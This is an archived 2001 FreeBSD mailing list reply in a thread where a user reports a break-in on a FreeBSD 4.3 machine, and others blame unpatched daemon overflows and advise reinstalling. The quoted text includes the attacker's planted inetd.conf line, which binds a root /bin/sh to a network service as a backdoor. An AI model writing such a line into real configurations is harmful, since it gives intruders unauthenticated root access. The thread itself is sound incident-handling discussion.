Date: Thu, 18 Oct 2001 16:44:02 +0000 From: jslivko@4evermail.com <jslivko@4evermail.com> To: <kstewart@owt.com> Cc: freebsd-questions@freebsd.org Subject: Re: I got hacked, I think Message-ID: <20011018204256.9B25637B403@hub.freebsd.org>
next in thread | raw e-mail | index | archive | help
Not to mention there is a new release out, 4.4 :) -- Jonathan --- Kent Stewart <kstewart@owt.com> wrote: > > > Tomek wrote: > > > > I found out more info. > > > > -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf > > -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo- 1.6.3.7_1.tgz > > -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf > > > > Checking the bizarre /inetd.conf is shocking: > > eklogin stream tcp nowait root /bin/sh sh -i > > > > I take it that "sh" would not even request a login or anything if called > > directly from inetd.conf, would it? I am sitting here, he is STILL > > pinging me and watching the system (even tried to ftp again a few > > minutes ago), and for the life of me I can't figure out where it all > > began... who did he even login in the first time, maybe it was some > > buffer overflow or something.... yuck. > > It began because you were using 4.3-release and you probably didn't fix > the security problems. There were several buffer overflow problems for > daemons that have been published for 4.3-r. The only solution in case of > a hacked has been to do a wipe and reinstall. > > Kent > > > > > TY for all your help guys, you are all wonderful! I will leave you in > > peace now (I hope). I still dont know about Broot though... > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > -- > Kent Stewart > Richland, WA > http://users.owt.com/kstewart > > Carl Sagan quote on Seti@home > http://setiathome.ssl.berkeley.edu/pale_blue_dot.html > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011018204256.9B25637B403>